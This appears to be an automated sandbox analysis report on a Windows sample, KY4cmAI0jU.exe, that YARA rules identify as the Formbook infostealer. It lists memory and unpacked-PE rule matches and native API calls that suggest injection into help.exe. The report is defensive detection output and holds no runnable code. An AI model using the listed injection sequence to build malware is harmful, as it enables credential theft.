          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004181D0 NtCreateFile,1_2_004181D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00418280 NtReadFile,1_2_00418280
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00418300 NtClose,1_2_00418300
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004183B0 NtAllocateVirtualMemory,1_2_004183B0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041827B NtCreateFile,1_2_0041827B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004182FD NtClose,1_2_004182FD
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004183AB NtAllocateVirtualMemory,1_2_004183AB
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B098F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B098F0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B09860
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09840 NtDelayExecution,LdrInitializeThunk,1_2_00B09840
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B099A0 NtCreateSection,LdrInitializeThunk,1_2_00B099A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B09910
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A20 NtResumeThread,LdrInitializeThunk,1_2_00B09A20
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B09A00
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A50 NtCreateFile,LdrInitializeThunk,1_2_00B09A50
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B095D0 NtClose,LdrInitializeThunk,1_2_00B095D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09540 NtReadFile,LdrInitializeThunk,1_2_00B09540
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B096E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B096E0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B09660
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B097A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B09780
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09FE0 NtCreateMutant,LdrInitializeThunk,1_2_00B09FE0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B09710
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B098A0 NtWriteVirtualMemory,1_2_00B098A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09820 NtEnumerateKey,1_2_00B09820
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0B040 NtSuspendThread,1_2_00B0B040
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B099D0 NtCreateProcessEx,1_2_00B099D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09950 NtQueueApcThread,1_2_00B09950
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A80 NtOpenDirectoryObject,1_2_00B09A80
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09A10 NtQuerySection,1_2_00B09A10
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0A3B0 NtGetContextThread,1_2_00B0A3B0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09B00 NtSetValueKey,1_2_00B09B00
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B095F0 NtQueryInformationFile,1_2_00B095F0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0AD30 NtSetContextThread,1_2_00B0AD30
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09520 NtWaitForSingleObject,1_2_00B09520
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09560 NtWriteFile,1_2_00B09560
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B096D0 NtCreateKey,1_2_00B096D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09610 NtEnumerateValueKey,1_2_00B09610
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09670 NtQueryInformationProcess,1_2_00B09670
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09650 NtQueryValueKey,1_2_00B09650
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09730 NtQueryVirtualMemory,1_2_00B09730
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0A710 NtOpenProcessToken,1_2_00B0A710
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09770 NtSetInformationFile,1_2_00B09770
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0A770 NtOpenThread,1_2_00B0A770
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B09760 NtOpenProcess,1_2_00B09760
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004181D0 NtCreateFile,1_1_004181D0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00418280 NtReadFile,1_1_00418280
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00418300 NtClose,1_1_00418300
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004183B0 NtAllocateVirtualMemory,1_1_004183B0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041827B NtCreateFile,1_1_0041827B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004182FD NtClose,1_1_004182FD
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004183AB NtAllocateVirtualMemory,1_1_004183AB
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A50 NtCreateFile,LdrInitializeThunk,6_2_02F39A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39860 NtQuerySystemInformation,LdrInitializeThunk,6_2_02F39860
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39840 NtDelayExecution,LdrInitializeThunk,6_2_02F39840
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F399A0 NtCreateSection,LdrInitializeThunk,6_2_02F399A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_02F39910
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F396E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02F396E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F396D0 NtCreateKey,LdrInitializeThunk,6_2_02F396D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02F39660
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39650 NtQueryValueKey,LdrInitializeThunk,6_2_02F39650
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39FE0 NtCreateMutant,LdrInitializeThunk,6_2_02F39FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39780 NtMapViewOfSection,LdrInitializeThunk,6_2_02F39780
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39710 NtQueryInformationToken,LdrInitializeThunk,6_2_02F39710
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F395D0 NtClose,LdrInitializeThunk,6_2_02F395D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39540 NtReadFile,LdrInitializeThunk,6_2_02F39540
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A80 NtOpenDirectoryObject,6_2_02F39A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A20 NtResumeThread,6_2_02F39A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A10 NtQuerySection,6_2_02F39A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39A00 NtProtectVirtualMemory,6_2_02F39A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3A3B0 NtGetContextThread,6_2_02F3A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39B00 NtSetValueKey,6_2_02F39B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F398F0 NtReadVirtualMemory,6_2_02F398F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F398A0 NtWriteVirtualMemory,6_2_02F398A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3B040 NtSuspendThread,6_2_02F3B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39820 NtEnumerateKey,6_2_02F39820
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F399D0 NtCreateProcessEx,6_2_02F399D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39950 NtQueueApcThread,6_2_02F39950
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39670 NtQueryInformationProcess,6_2_02F39670
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39610 NtEnumerateValueKey,6_2_02F39610
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F397A0 NtUnmapViewOfSection,6_2_02F397A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3A770 NtOpenThread,6_2_02F3A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39770 NtSetInformationFile,6_2_02F39770
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39760 NtOpenProcess,6_2_02F39760
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39730 NtQueryVirtualMemory,6_2_02F39730
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3A710 NtOpenProcessToken,6_2_02F3A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F395F0 NtQueryInformationFile,6_2_02F395F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39560 NtWriteFile,6_2_02F39560
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3AD30 NtSetContextThread,6_2_02F3AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F39520 NtWaitForSingleObject,6_2_02F39520
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005781D0 NtCreateFile,6_2_005781D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00578280 NtReadFile,6_2_00578280
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00578300 NtClose,6_2_00578300
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005783B0 NtAllocateVirtualMemory,6_2_005783B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0057827B NtCreateFile,6_2_0057827B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005782FD NtClose,6_2_005782FD
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_005783AB NtAllocateVirtualMemory,6_2_005783AB
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_004048530_2_00404853
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_004061310_2_00406131
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_73751A980_2_73751A98
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C87B1_2_0041C87B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_004011741_2_00401174
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041BA9A1_2_0041BA9A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00408C6B1_2_00408C6B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00408C701_2_00408C70
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041CC9C1_2_0041CC9C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C5481_2_0041C548
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041BDD41_2_0041BDD4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_0041C7AF1_2_0041C7AF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF20A01_2_00AF20A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B920A81_2_00B920A8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB0901_2_00ADB090
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B928EC1_2_00B928EC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9E8241_2_00B9E824
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA8301_2_00AEA830
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B810021_2_00B81002
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE41201_2_00AE4120
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACF9001_2_00ACF900
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B922AE1_2_00B922AE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB2361_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FA2B1_2_00B7FA2B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFEBB01_2_00AFEBB0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B1_2_00AF138B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E31_2_00B723E3
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B803DA1_2_00B803DA
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8DBD21_2_00B8DBD2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFABD81_2_00AFABD8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B92B281_2_00B92B28
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA3091_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAB401_2_00AEAB40
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B6CB4F1_2_00B6CB4F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B844961_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD841F1_2_00AD841F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB4771_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8D4661_2_00B8D466
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF25811_2_00AF2581
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D821_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E01_2_00ADD5E0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B925DD1_2_00B925DD
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC0D201_2_00AC0D20
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B92D071_2_00B92D07
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B91D551_2_00B91D55
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B92EF71_2_00B92EF7
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE6E301_2_00AE6E30
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8D6161_2_00B8D616
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B91FF11_2_00B91FF1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9DFCE1_2_00B9DFCE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C87B1_1_0041C87B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_004011741_1_00401174
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041BA9A1_1_0041BA9A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00408C6B1_1_00408C6B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00408C701_1_00408C70
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041CC9C1_1_0041CC9C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C5481_1_0041C548
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041BDD41_1_0041BDD4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00402D871_1_00402D87
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00402D901_1_00402D90
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_0041C7AF1_1_0041C7AF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_1_00402FB01_1_00402FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC22AE6_2_02FC22AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B2366_2_02F1B236
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAFA2B6_2_02FAFA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA23E36_2_02FA23E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB03DA6_2_02FB03DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBDBD26_2_02FBDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2ABD86_2_02F2ABD8
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2EBB06_2_02F2EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1EB9A6_2_02F1EB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2138B6_2_02F2138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1AB406_2_02F1AB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F9CB4F6_2_02F9CB4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC2B286_2_02FC2B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A3096_2_02F1A309
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC28EC6_2_02FC28EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F220A06_2_02F220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC20A86_2_02FC20A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0B0906_2_02F0B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1A8306_2_02F1A830
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FCE8246_2_02FCE824
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB10026_2_02FB1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F199BF6_2_02F199BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F141206_2_02F14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EFF9006_2_02EFF900
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC2EF76_2_02FC2EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FA1EB66_2_02FA1EB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F16E306_2_02F16E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBD6166_2_02FBD616
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F156006_2_02F15600
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC1FF16_2_02FC1FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FCDFCE6_2_02FCDFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB44966_2_02FB4496
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F1B4776_2_02F1B477
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBD4666_2_02FBD466
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0841F6_2_02F0841F
